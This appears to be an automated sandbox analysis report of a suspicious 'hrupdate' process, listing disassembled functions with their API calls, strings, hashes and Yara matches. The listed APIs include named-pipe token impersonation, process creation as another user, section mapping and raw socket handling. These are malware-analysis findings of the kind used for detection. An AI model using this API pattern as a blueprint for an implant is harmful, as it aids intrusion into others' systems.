                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$__snprintf_rand
                                      • String ID: %s%s
                                      • API String ID: 4266533377-3438391663
                                      • Opcode ID: 48ff118005b44f592f4469dedb847140416168c8d284748c897e3be36f94970d
                                      • Instruction ID: c486375156545a92da414254c33a6bde33c1cfcd44ac37c73f743d8feaaa7bc6
                                      • Opcode Fuzzy Hash: 48ff118005b44f592f4469dedb847140416168c8d284748c897e3be36f94970d
                                      • Instruction Fuzzy Hash: 4121AE31900100ABDF15AF45CC85F9B7BAAEF92744F254094EE006B25AE6B1FD61CBE9
                                      Function 0469873A Relevance: 10.6, APIs: 7, Instructions: 59pipethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 04698757
                                      • GetLastError.KERNEL32 ref: 0469876A
                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 0469877E
                                      • ImpersonateNamedPipeClient.ADVAPI32 ref: 046987A9
                                      • GetCurrentThread.KERNEL32 ref: 046987BE
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 046987C5
                                      • DisconnectNamedPipe.KERNEL32(046CE194), ref: 046987D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorImpersonateLastOpenToken_memset
                                      • String ID:
                                      • API String ID: 3598867581-0
                                      • Opcode ID: 4c865cfbfcd4d810c0990c705d859e17fa1900a47db5e1b3fb466bd2e976653e
                                      • Instruction ID: e9d2ad8e1edc9ac1325b8c3738ec64152ef3e4f0e17dddd5a9154f0ecbbc933e
                                      • Opcode Fuzzy Hash: 4c865cfbfcd4d810c0990c705d859e17fa1900a47db5e1b3fb466bd2e976653e
                                      • Instruction Fuzzy Hash: 8211C271600109AFEF006BA2ED85EFA3BBDEB01344F041065EA04E6552FB7DAD64CFA1
                                      Function 0469C9E3 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C9F1
                                      • ioctlsocket.WS2_32(?,8004667E,?), ref: 0469CA15
                                      • GetTickCount.KERNEL32 ref: 0469CA4C
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469CA71
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTickioctlsocket
                                      • String ID:
                                      • API String ID: 3686034022-0
                                      • Opcode ID: 959d1af40c1e5706e634261f37df002e02f77041073eab60f13a4b8593e108fe
                                      • Instruction ID: 98761eb6c729323793616dfd4645fa5a93ddddf593ab05260355ad8b54c77296
                                      • Opcode Fuzzy Hash: 959d1af40c1e5706e634261f37df002e02f77041073eab60f13a4b8593e108fe
                                      • Instruction Fuzzy Hash: 5C114C75510108BFEF00CFA4CC44BED7BECEB01769F008020E915D6191F7B8AE959EA5
                                      Function 00672A10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00672864,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00672A15
                                      • _Mtx_unlock.MSVCP140(?,A92820B5,?,00000000,00000000,00673E90,000000FF), ref: 00672A66
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672A74
                                      • _Mtx_destroy.MSVCP140(?), ref: 00672A7E
                                      • _Cnd_destroy.MSVCP140(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00672A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: C_error@std@@Cnd_destroyMtx_destroyMtx_unlockThrow_Xlength_error@std@@
                                      • String ID: string too long
                                      • API String ID: 1781926451-2556327735
                                      • Opcode ID: 1c900820fac4c448caedcd99ed31100015d3175ed928de62b9f047640b63d073
                                      • Instruction ID: 6087a436dcd0632423a26b9bc0b35a6bf7541ab4c67226b23069339bd4f692de
                                      • Opcode Fuzzy Hash: 1c900820fac4c448caedcd99ed31100015d3175ed928de62b9f047640b63d073
                                      • Instruction Fuzzy Hash: CC01B1B1904604EBD7248F64EC09B9B77EEFF04724F054639FA1ED3780DB35A9148AA6
                                      Function 046A4E60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 046A4E67
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _malloc.LIBCMT ref: 046A4E74
                                      • _malloc.LIBCMT ref: 046A4E8F
                                      • __snprintf.LIBCMT ref: 046A4EA2
                                      • _malloc.LIBCMT ref: 046A4EC1
                                      Strings
                                      • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 046A4E95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$AllocateHeap__snprintf
                                      • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                      • API String ID: 3929630252-2739389480
                                      • Opcode ID: eb4d51d847d367650917632bfecfad93f2afc5cd15de6a7f1381bfdefa91bd14
                                      • Instruction ID: 749f08bb4c59dfc4fe84af5f7661d047e72283e989dddffd6c8f5b632fe508d9
                                      • Opcode Fuzzy Hash: eb4d51d847d367650917632bfecfad93f2afc5cd15de6a7f1381bfdefa91bd14
                                      • Instruction Fuzzy Hash: 40014F71940704AEE7109FA9D884996BBE8EF44654B00C82DF58DD7200EA71E9548BA4
                                      Function 04698C34 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0469F2E8: GetCurrentProcess.KERNEL32(?,0469AF55,?,0469AFAD), ref: 0469F2F4
                                      • GetLastError.KERNEL32(?,?,?,0469E106,00000000), ref: 04698C85
                                      • _malloc.LIBCMT ref: 04698CF4
                                      • _memset.LIBCMT ref: 04698D03
                                      • _memset.LIBCMT ref: 04698D34
                                      • GetLastError.KERNEL32 ref: 04698D62
                                      • _memset.LIBCMT ref: 04698D77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$ErrorLast$CurrentProcess_malloc
                                      • String ID:
                                      • API String ID: 2196066725-0
                                      • Opcode ID: 43b21a1e4d7b7c07d37469cb8ae2968ddcca1c8d1a5ba46455ded156afd4dde7
                                      • Instruction ID: 7b8f75893ed290fd573bfbae7d0fb6226d7cbe708c86cea41985fe2ac4f21aeb
                                      • Opcode Fuzzy Hash: 43b21a1e4d7b7c07d37469cb8ae2968ddcca1c8d1a5ba46455ded156afd4dde7
                                      • Instruction Fuzzy Hash: 90418DF6900108BEFF10ABA4CC41EBE76FCDF05658F040069FA44D2181FAA6AD659B79
                                      Function 0469C0B4 Relevance: 9.1, APIs: 6, Instructions: 113pipesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetNamedPipeInfo.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0469C11C
                                      • SetNamedPipeHandleState.KERNEL32(00000000,00000001,00000000,00000000), ref: 0469C133
                                      • Sleep.KERNEL32(000001F4), ref: 0469C189
                                      • GetLastError.KERNEL32 ref: 0469C1A2
                                      • SetNamedPipeHandleState.KERNEL32(00000000,00000001,00000000,00000000), ref: 0469C1BE
                                      • GetLastError.KERNEL32 ref: 0469C1C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NamedPipe$ErrorHandleLastState$InfoSleep
                                      • String ID:
                                      • API String ID: 1433407474-0
                                      • Opcode ID: 4725023c011bbb2ff8df8fd30548d7f691db36b1d4ea8dd09cfd2b7cde8b8533
                                      • Instruction ID: 9a69cd7b8e20fee967ad697451bf62d7a79df4896b206cc9741672212bb604f4
                                      • Opcode Fuzzy Hash: 4725023c011bbb2ff8df8fd30548d7f691db36b1d4ea8dd09cfd2b7cde8b8533
                                      • Instruction Fuzzy Hash: 3D314FB2900209EFEF109FD5D8849BEB7FDFF14345B10442AE601A6241F6B5BE849B65
                                      Function 0469E2E4 Relevance: 9.1, APIs: 6, Instructions: 99threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32 ref: 0469E306
                                      • UpdateProcThreadAttribute.KERNELBASE(00000000,00000000,00020000,?,00000004,00000000,00000000), ref: 0469E334
                                      • GetLastError.KERNEL32 ref: 0469E33E
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E376
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E39E
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E3BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                      • String ID:
                                      • API String ID: 1014270282-0
                                      • Opcode ID: 0fbce27b63f8fc4f95d614a234d86377c5a8fa62be771fd40bec2e93ccf59a6b
                                      • Instruction ID: 43377552425fa630cb9398edf279206094992a2ae8bbe03ad787ad5f591f35c0
                                      • Opcode Fuzzy Hash: 0fbce27b63f8fc4f95d614a234d86377c5a8fa62be771fd40bec2e93ccf59a6b
                                      • Instruction Fuzzy Hash: CB21A571740214BBEF209EA1DC49FAB3BACEF45754F140004FA09DA281F6B6AD508AA1
                                      Function 00B10A00 Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • accept.WS2_32(?,00000000,00000000), ref: 00B10A19
                                      • recv.WS2_32(?,?,00000001,00000002), ref: 00B10A44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: acceptrecv
                                      • String ID:
                                      • API String ID: 1078442044-0
                                      • Opcode ID: 799bfebe58026d8e8ac49e2f0a8ef1b9ac088bc460928630091ac0786317cf23
                                      • Instruction ID: 1b4cf0423e2c931f1d2c52e35636277c4587e53133d62d2bc4c0f2bf30d8cedd
                                      • Opcode Fuzzy Hash: 799bfebe58026d8e8ac49e2f0a8ef1b9ac088bc460928630091ac0786317cf23
                                      • Instruction Fuzzy Hash: 87310B34A64308EBDB10EF54C885BEABBB5EF54705FA0C494EA059B280D7B19DC1DB90
                                      Function 0469BB3D Relevance: 9.1, APIs: 6, Instructions: 80synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0469BB53
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(046DA6C0), ref: 0469BB5D
                                      • htonl.WS2_32(00000000), ref: 0469BB67
                                      • htonl.WS2_32(00000000), ref: 0469BB72
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,046DA6C0,00000001,00000000,00000000,046948C6), ref: 0469BBD1
                                      • _memset.LIBCMT ref: 0469BC02
                                        • Part of subcall function 0469BCE9: PeekNamedPipe.KERNEL32(00000000,00000000,00000004,046948C6,00000000,00000000,00000001,046DA6C0,00000000,046DA6C0,00000001,00000000,00000000,046948C6), ref: 0469BD21
                                        • Part of subcall function 0469BCE9: htonl.WS2_32(?), ref: 0469BD3F
                                        • Part of subcall function 0469BCE9: PeekNamedPipe.KERNEL32(00000008,?,00000004,00000004,00000008,00000000), ref: 0469BD8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: htonl$NamedPeekPipe$AllocateHeapObjectSingleWait_malloc_memset
                                      • String ID:
                                      • API String ID: 3572882391-0
                                      • Opcode ID: 14d2cf6094516da52c6fc2ccd2a9f2953b7b844a1cdc8efa4b0a281cc25487b4
                                      • Instruction ID: 2da815c1d860b503b5823ffa9c66920054e4d2b320de928620676b84518fd11d
                                      • Opcode Fuzzy Hash: 14d2cf6094516da52c6fc2ccd2a9f2953b7b844a1cdc8efa4b0a281cc25487b4
                                      • Instruction Fuzzy Hash: B821F2765007109AEF306F64E940A6673ECFF00B28710452DD9858A698FFB1BD8187A5
                                      Function 0469B42A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,00000000,?,0469B0D7,00000000,00000000,00000000), ref: 0469B463
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B46A
                                      • GetLastError.KERNEL32(?,0469B0D7,00000000,00000000,00000000), ref: 0469B4D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressErrorHandleLastModuleProc
                                      • String ID: NtMapViewOfSection$ntdll.dll
                                      • API String ID: 4275029093-3170647572
                                      • Opcode ID: 787b6c8bea718d563764e4eb9341916f6b5d40ab83a40d68f5167fbd14d5082e
                                      • Instruction ID: 833a7abe929375d49b4c637e346953a8f6248274946429cac4d01293156bdcfd
                                      • Opcode Fuzzy Hash: 787b6c8bea718d563764e4eb9341916f6b5d40ab83a40d68f5167fbd14d5082e
                                      • Instruction Fuzzy Hash: 0821C272900318BFDF11ABE5AC488FE7BACEF45F24B104419F61196241FAB4AE509FA4
                                      Function 00673370 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(00676558), ref: 006733A2
                                      • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(00676564), ref: 006733B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _initialize_onexit_table
                                      • String ID: Xeg$deg
                                      • API String ID: 2450287516-1437564310
                                      • Opcode ID: 5d01c8112cd13dd6f41b2271518ea5b3973367629e4a246e9b568d79b0e3f97f
                                      • Instruction ID: 30025809b1b4869a212358aa8aa1dfdb1b2241075eebc18d5b113ece6788e583
                                      • Opcode Fuzzy Hash: 5d01c8112cd13dd6f41b2271518ea5b3973367629e4a246e9b568d79b0e3f97f
                                      • Instruction Fuzzy Hash: 8F11BF32D10A60AADF15DF68D8057CE7BE74B01720F01C059E81CAB385D6718B85A7A0
                                      Function 04695261 Relevance: 7.7, APIs: 5, Instructions: 228COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_strncpy
                                      • String ID:
                                      • API String ID: 3537405232-0
                                      • Opcode ID: ceb812755fb89d2f77326bd70518b4a1071beb148d97ab0962bfaec6eca3e149
                                      • Instruction ID: 1284c4178876f8ec516f557f711f15452892779bb6f3264b973382baddcfd54f
                                      • Opcode Fuzzy Hash: ceb812755fb89d2f77326bd70518b4a1071beb148d97ab0962bfaec6eca3e149
                                      • Instruction Fuzzy Hash: 4581C172D00209ABEF12DB64D844FEE77FCAB04318F5445AAE516AB281F7B1FE048B54
                                      Function 04694A3A Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_strncpy
                                      • String ID:
                                      • API String ID: 3537405232-0
                                      • Opcode ID: 98e570df8f27764c94a0a27d41fd18048173302addea7886ff6356281b5acf94
                                      • Instruction ID: 2c09ae495c6e0d918fc20eccc60cbcbcff1caf81bfb64e8c542982d9accc68cf
                                      • Opcode Fuzzy Hash: 98e570df8f27764c94a0a27d41fd18048173302addea7886ff6356281b5acf94
                                      • Instruction Fuzzy Hash: DC51BA72D4424AAAEF10DAE0DC41FEE77FCEB00308F008476E515AB185FA75BE468B54
                                      Function 046979E2 Relevance: 7.6, APIs: 5, Instructions: 99timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 04697A00
                                        • Part of subcall function 046A4DDD: htonl.WS2_32(?), ref: 046A4E37
                                        • Part of subcall function 046A4DDD: htonl.WS2_32(?), ref: 046A4E41
                                      • GetLocalTime.KERNEL32(?), ref: 04697A28
                                      • GetLocalTime.KERNEL32(?), ref: 04697A72
                                      • GetLocalTime.KERNEL32(?), ref: 04697ABA
                                      • GetCurrentDirectoryA.KERNEL32(00000800,00000000), ref: 04697AE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$htonl$CurrentDirectory_memset
                                      • String ID:
                                      • API String ID: 1947157357-0
                                      • Opcode ID: 229bb2572fa41ec3ccd13440f2da7813074716d69917c9d81c1a16a6cd8191e5
                                      • Instruction ID: eef8b39de4ce7bd9b435b5a53d072668003d1cd18d24e92d89c8294c8677c828
                                      • Opcode Fuzzy Hash: 229bb2572fa41ec3ccd13440f2da7813074716d69917c9d81c1a16a6cd8191e5
                                      • Instruction Fuzzy Hash: BF31D872D00209AAEF20ABF4D809BEE77ACDF11715F104466E510EA0C1FE78EF518E54
                                      Function 046990A3 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessAsUserA.ADVAPI32(046DAF5C,00000000,0469E106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,0469919B,?), ref: 046990C9
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 046990D9
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 046990F3
                                        • Part of subcall function 04698E95: _memset.LIBCMT ref: 04698EC3
                                        • Part of subcall function 04698E95: _memset.LIBCMT ref: 04698EDF
                                      • CreateProcessA.KERNEL32(00000000,0469E106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,0469919B,?,?), ref: 04699118
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 04699122
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$CreateProcess_memset$User
                                      • String ID:
                                      • API String ID: 3779600536-0
                                      • Opcode ID: 0802a6bdd006f54d330528531eb2992a32f49a17ba4d0c257da6d91fd5c5f90e
                                      • Instruction ID: 6e3006de87bbf438d19a7bd745a680d179ff59700d8d41f7f82e2a8914eaaa5f
                                      • Opcode Fuzzy Hash: 0802a6bdd006f54d330528531eb2992a32f49a17ba4d0c257da6d91fd5c5f90e
                                      • Instruction Fuzzy Hash: D71182B1200640BEDF315EA2DC48D677BFEFBC6B44B10481DF55280210F6A6AC55EA20
                                      Function 0469DB9B Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469DBC0
                                      • GetTickCount.KERNEL32 ref: 0469DBD8
                                      • shutdown.WS2_32(676494AD,00000002), ref: 0469DBF3
                                      • shutdown.WS2_32(676494AD,00000002), ref: 0469DC00
                                      • closesocket.WS2_32(676494AD), ref: 0469DC05
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTickshutdown$closesocket
                                      • String ID:
                                      • API String ID: 3414035747-0
                                      • Opcode ID: 9cec19ef55674a453c4847f9bf0135c0215e73e1dc0bb7573f76d3cd30ecfbc8
                                      • Instruction ID: 27ca757af445f0457b357bd7808382c65b914c7422b26957245b45e77eaa69b3
                                      • Opcode Fuzzy Hash: 9cec19ef55674a453c4847f9bf0135c0215e73e1dc0bb7573f76d3cd30ecfbc8
                                      • Instruction Fuzzy Hash: F9116DB1900B11CFEF709E38E804A26B3E8FB15755B004A3ED48A93A48F7B5FC018B90
                                      Function 00B10840 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B1086E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 032615ee799a844b4eaf843d42a166f93b94703b2570c5b761f403b1acabe3f2
                                      • Instruction ID: 82bb5ce020ff25e21905689b972060fb409ceee34f72a61e7d36b9a7b2b3ac73
                                      • Opcode Fuzzy Hash: 032615ee799a844b4eaf843d42a166f93b94703b2570c5b761f403b1acabe3f2
                                      • Instruction Fuzzy Hash: F5211434A14245EBCB04DF58C588FE57BA6FB48344F94C1A8EA495F241CBB1E9C5CBE0
                                      Function 0469BDB3 Relevance: 7.5, APIs: 5, Instructions: 49pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 046A3BBA: _memset.LIBCMT ref: 046A3C43
                                      • GetLastError.KERNEL32(759223A0,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BDC3
                                      • WaitNamedPipeA.KERNEL32(?,00002710), ref: 0469BDD8
                                      • SetNamedPipeHandleState.KERNEL32(04697D15,?,00000000,00000000,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BE01
                                      • DisconnectNamedPipe.KERNEL32(04697D15,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BE0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NamedPipe$DisconnectErrorHandleLastStateWait_memset
                                      • String ID:
                                      • API String ID: 1374046827-0
                                      • Opcode ID: 067cc0a7c09312d3b80d176b55c1e4d7bb19dd1fbcfbc30aa2d95ea1d4bf2dfa
                                      • Instruction ID: f4eceb209d15ba7c87fb0769b458f7eb640ec8f6104460ccb98ce21be126b49d
                                      • Opcode Fuzzy Hash: 067cc0a7c09312d3b80d176b55c1e4d7bb19dd1fbcfbc30aa2d95ea1d4bf2dfa
                                      • Instruction Fuzzy Hash: 2C018471604001EEEF101F65EC08ABA7BEDFF05B90B104929F545D9191FAB1AC519E20
                                      Function 046B6CDE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 046B6CEA
                                        • Part of subcall function 046B061D: __getptd_noexit.LIBCMT ref: 046B0620
                                        • Part of subcall function 046B061D: __amsg_exit.LIBCMT ref: 046B062D
                                      • __amsg_exit.LIBCMT ref: 046B6D0A
                                      • __lock.LIBCMT ref: 046B6D1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 046B6D37
                                      • InterlockedIncrement.KERNEL32(04CF1668), ref: 046B6D62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                      • String ID:
                                      • API String ID: 4271482742-0
                                      • Opcode ID: 50869143addffde63586969ddd9d5d43336dbc5225eeaba8788eb10cd3adbc47
                                      • Instruction ID: 7f8fcad35b065eb8f06ada20eaa1f56604a948ac2d294db29f6e935b1d4b8f25
                                      • Opcode Fuzzy Hash: 50869143addffde63586969ddd9d5d43336dbc5225eeaba8788eb10cd3adbc47
                                      • Instruction Fuzzy Hash: 65018431E00B21A7DB20AF24D4057ED7760EF01B24F14054AD490A7680FB3879D1CFDA
                                      Function 04697B77 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 04697B84
                                      • gethostbyname.WS2_32(?), ref: 04697B98
                                      • htons.WS2_32(?), ref: 04697BC1
                                      • connect.WS2_32(00000000,?,00000010), ref: 04697BD1
                                      • closesocket.WS2_32(00000000), ref: 04697BDB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
